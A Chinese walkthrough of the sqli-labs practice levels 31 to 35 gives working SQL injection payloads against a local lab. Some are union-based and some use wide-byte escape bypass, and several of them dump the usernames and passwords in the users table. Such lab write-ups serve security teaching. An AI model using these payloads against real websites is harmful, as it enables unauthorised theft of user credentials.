sql-labs31-34关通关攻略

news2024/12/28 19:57:57

第三十一关

一.判断闭合

1“” 

二.查询数据库

http://127.0.0.1/Less-31/?id=-1%22)%20union%20select%201,2,database()--+icon-default.png?t=N7T8http://127.0.0.1/Less-31/?id=-1%22)%20union%20select%201,2,database()--+

 

三.查表

http://127.0.0.1/Less-31/?id=-1%22)%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)--+icon-default.png?t=N7T8http://127.0.0.1/Less-31/?id=-1%22)%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)--+

 

四.查列

http://127.0.0.1/Less-31/?id=-1%22)%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)--+icon-default.png?t=N7T8http://127.0.0.1/Less-31/?id=-1%22)%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)--+

五.查询users表中所有数据

 

第三十二关 

一.判断闭合点

1’

二.查询数据库

http://127.0.0.1/Less-32/?id=-1%aa%5c%27%20union%20select%201,2,database()%20--+icon-default.png?t=N7T8http://127.0.0.1/Less-32/?id=-1%aa%5c%27%20union%20select%201,2,database()%20--+

 

三.查表

http://127.0.0.1/Less-32/?id=-1%aa%5c%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%20--+icon-default.png?t=N7T8http://127.0.0.1/Less-32/?id=-1%aa%5c%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%20--+

 四.查列 

http://127.0.0.1/Less-32/?id=-1%aa%5c%27%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=(select%20right(group_concat(table_name),5)%20from%20information_schema.columns%20where%20table_schema=database()))--+icon-default.png?t=N7T8http://127.0.0.1/Less-32/?id=-1%aa%5c%27%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=(select%20right(group_concat(table_name),5)%20from%20information_schema.columns%20where%20table_schema=database()))--+

五.查user表中所有数据

http://127.0.0.1/Less-32/?id=-1%aa%5c%27%20union%20select%201,2,group_concat(username,0,password)%20from%20users--+icon-default.png?t=N7T8http://127.0.0.1/Less-32/?id=-1%aa%5c%27%20union%20select%201,2,group_concat(username,0,password)%20from%20users--+

三十三关 

一判断闭合方式

1’

二.查询数据库 

http://127.0.0.1/Less-33/?id=-1%aa%5c%27%20union%20select%201,2,database()--+icon-default.png?t=N7T8http://127.0.0.1/Less-33/?id=-1%aa%5c%27%20union%20select%201,2,database()--+

三.查表

http://127.0.0.1/Less-33/?id=-1%aa%5c%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())--+icon-default.png?t=N7T8http://127.0.0.1/Less-33/?id=-1%aa%5c%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())--+

 四.查列

http://127.0.0.1/Less-33/?id=-1%aa%5c%27%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=(select%20right(group_concat(table_name),5)%20from%20information_schema.tables%20where%20table_schema=database()))--+icon-default.png?t=N7T8http://127.0.0.1/Less-33/?id=-1%aa%5c%27%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=(select%20right(group_concat(table_name),5)%20from%20information_schema.tables%20where%20table_schema=database()))--+

五.查user表里所有数据

http://127.0.0.1/Less-33/?id=-1%aa%5c%27%20union%20select%201,2,(select%20group_concat(username,0,password)%20from%20security.users)--+icon-default.png?t=N7T8http://127.0.0.1/Less-33/?id=-1%aa%5c%27%20union%20select%201,2,(select%20group_concat(username,0,password)%20from%20security.users)--+

 

第三十四关

一.利用burp进行抓包

二.查询数据库

uname=-1%df' union select 1,2#&passwd=1&submit=Submit

 

三.查表

uname=-1%df' union select  1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=1&submit=Submit
 

四.查列
 

uname=-1%df' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x656D61696C73#&passwd=1&submit=Submit

 

五.查user表中所有数据

uname=-1%df' union select 1,group_concat(id,0x3a,email_id) from emails#&passwd=1&submit=Submit

 

第三十五关

一.查询数据库

http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,database()--+icon-default.png?t=N7T8http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,database()--+

 

二. 查表

http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())--+icon-default.png?t=N7T8http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())--+

三.查列

http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=(select%20right(group_concat(table_name),5)%20from%20information_schema.tables%20where%20table_schema=database()))--+icon-default.png?t=N7T8http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=(select%20right(group_concat(table_name),5)%20from%20information_schema.tables%20where%20table_schema=database()))--+

四.查user表里所有数据

http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,(select%20group_concat(username,0,password)%20from%20security.users)--+icon-default.png?t=N7T8http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,(select%20group_concat(username,0,password)%20from%20security.users)--+

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2076537.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

机器学习之 贝叶斯算法 及朴素贝叶斯分类器的代码实现(给我点赞的都发财,谢谢)

贝叶斯算法简介 贝叶斯算法是一种基于概率论的统计学方法,广泛应用于机器学习领域。它基于贝叶斯定理,用于计算后验概率。贝叶斯定理可以表述为: 其中: P(A∣B) 表示在事件 B 发生的情况下事件 A 发生的概率,称为后…

发现一个通用的滑块验证码缺口识别库 captcha-recognizer (两行代码识别滑块验证码缺口)

文章目录 前言安装与使用安装使用示例 识别效果展示总结 前言 滑块验证码缺口位置是滑块验证码验证的关键,在此本文介绍一个滑块验证码的通用识别库,基于深度学习实现通用的滑块验证码的识别。并封装为易用的Python库,传入图片即可识别出缺口…

学习笔记 韩顺平 零基础30天学会Java(2024.8.26)

P536 HMap阶段小结 P537 HMap底层机制 HashMap$Node($意思是一个内部类)实现了Map$Entry,因此HashMap$Node的底层可以看成是Map$Entry(对前面有关Entry那一节课的继续理解) P538 HMap源码解读 P539 HMap扩容树化触发 P…

使用HTML实现贪吃蛇游戏

<!DOCTYPE html> <html lang"zh-CN"> <head><meta charset"UTF-8"><meta name"viewport" content"widthdevice-width, initial-scale1.0"><title>贪吃蛇游戏</title><style>canvas {…

【题解】【模拟】—— [CSP-J 2021] 小熊的果篮

【题解】【模拟】—— [CSP-J 2021] 小熊的果篮 [CSP-J 2021] 小熊的果篮题目描述输入格式输出格式输入输出样例输入 #1输出 #1输入 #2输出 #2输入 #3输出 #3 提示 思路1.数组模拟&#xff08;70分&#xff09;1.1.题意解析1.2.参考代码 思路2.双向链表模拟&#xff08;60分&am…

FastCGI简述

FastCGI (FCGI) 是一种协议&#xff0c;用于改善 Web 服务器和应用程序之间的通信效率。它是在 CGI&#xff08;Common Gateway Interface&#xff09;的基础上发展起来的&#xff0c;旨在解决 CGI 在处理大量并发请求时存在的性能问题。 CGI的由来 最早的Web服务器只能简单地…

Java入门:06.Java中的方法--扩展(值传递和址传递与主方法传参)

1 值传递和址传递 值传递 方法调用时&#xff0c;如果传递的实际参数是一个基本类型的数据&#xff0c;那么如果只有形式参数发生改变的话&#xff0c;实参是不会发生变化的&#xff0c;因为我们传递的是变量中具体的数据。 main(){int i 10 ;t1(i) ; //值传递System.out.p…

Nacos源码分析

Nacos源码分析 1.下载Nacos源码并运行 要研究Nacos源码自然不能用打包好的Nacos服务端jar包来运行&#xff0c;需要下载源码自己编译来运行。 1.1.下载Nacos源码 Nacos的GitHub地址&#xff1a;https://github.com/alibaba/nacos 如果需要研究其他版本的&#xff0c;也可以…

自动化代码报错:ElementClickInterceptedException 解决方案

在自动化测试中&#xff0c;如果有多个弹窗出现&#xff0c;代码执行可能会遇到ElementClickInterceptedException的错误&#xff0c;表明元素点击被拦截&#xff1a; 一般由于以下原因&#xff1a; 一、页面加载未完成 在页面尚未完全加载完成时尝试点击某个元素&#xff0c…

Vue3基础1

1、optionsApi 与 Composition Api 选项式与组合式 组合就是一个一个 的函数 &#xff0c;每个函数里都有 data&#xff0c;methods&#xff0c;compute 等等 2、拉开序幕的setup setup执行时机 在 beforeCreate之前 <template><div class"person">&l…

Qt:玩转QPainter序列四补充(裁剪家族)

前言 本文补充上篇缺失的裁剪家族。 正文 9.裁剪家族 QRegion clipRegion() const; 功能&#xff1a;返回当前的剪裁区域 (clip region)。剪裁区域限制了绘制操作的范围&#xff0c;只有在剪裁区域内的部分才会被绘制。返回值&#xff1a;一个 QRegion 对象&#xff0c;表…

【c语法】##__VA_ARGS__与__VA_ARGS__

欢迎来到 破晓的历程的 博客 ⛺️不负时光&#xff0c;不负己✈️ 文章目录 引言__VA_ARGS__ 引言 在调试过程中&#xff0c;我们经常会自定义打印&#xff0c;比如日志信息的输出&#xff0c;这时就会用VA_ARGS,接下来详细讲解&#xff01; VA_ARGS __VA_ARGS__是C语言设定…

数据展现新方式,Excel子弹图制作全攻略!

在做数据汇报时&#xff0c;如何让你的报告脱颖而出&#xff0c;瞬间吸引老板和同事的注意力&#xff1f;答案就是子弹图&#xff01;今天&#xff0c;我们就来教你如何利用Excel这个强大的工具&#xff0c;轻松制作出专业又美观的子弹图&#xff0c;不论你是数据小白还是职场老…

sqli-labs靶场通关攻略(31-35关)

第31关&#xff08; ") 闭合&#xff09; 查数据库 ?id") union select 1,2,database() -- 查表 ?id") union select 1,2,group_concat(table_name) from information_schema.tables where table_schemasecurity-- 查列 ?id") union select 1,2,gro…

量化交易backtrader实践(四)_评价统计篇(2)_评价输出

上节回顾 上一节我们对backtrader内置的一堆评价指标进行了实践&#xff0c;从视觉上对这些评价指标的输出参数有了个大概的了解。接下来&#xff0c;我们在循环对多支股票或多个策略进行回测的时候&#xff0c;就可以将评价的一些值进行输出了&#xff0c;这样就能对于股票和…

建筑企业如何搭建数据仓库?做好这三步,大幅节约企业成本!

在当今这个数据驱动的时代&#xff0c;建筑企业正面临着前所未有的挑战和机遇。随着项目规模的扩大和市场环境的复杂化&#xff0c;如何有效管理和分析海量数据&#xff0c;已经成为提升企业竞争力的关键。数据仓库作为企业数据管理的核心&#xff0c;不仅能够整合分散的数据资…

攻防世界 reverse_re3

前言&#xff1a;做题笔记。 下载解压 查壳。 64ida 打开 查找字符并跟进 wasd一看&#xff0c;这题就是关于迷宫的题。跟进看看。 懵。。。不过还是得仔细看看。 观察发现。 进去看看。 然后最开始&#xff0c;因为数据太多把我卡住了。。。 回过头仔细看看。 猜测dword_202…

企业建站技术路线探索

前言 企业站是指企业或公司创建的官方网站&#xff0c;用于展示企业信息、产品和服务。它通常包括公司简介、产品或服务介绍、联系方式、新闻更新等内容。企业站的目的是提升品牌形象、提供客户服务和促进业务发展。在跨境贸易中&#xff0c;企业建站尤为关键&#xff0c;因为…

数据库集群技术

源码安装mysql mysql.com [https://downloads.mysql.com/archives/community/]: 官网下载 安装依赖性&#xff1a; [rootmysql-node2 ~]# dnf install cmake gcc-c openssl-devel \ ncurses-devel.x86_64 libtirpc-devel-1.3.3-8.el9_4.x86_64.rpm rpcgen.x86_64 下载并解压源…

Netty系列-1 NioEventLoopGroup和NioEventLoop介绍

背景 从本文开始开启一个新的专题Netty系列&#xff0c;用于收集Netty相关的文章&#xff0c;内容包含Netty的使用方式、运行原理等。 基于io.netty:netty-all:4.1.49.Final版本进行介绍 1.NioEventLoopGroup 介绍NioEventLoopGroup之前&#xff0c;有几个相关的组件需要提前…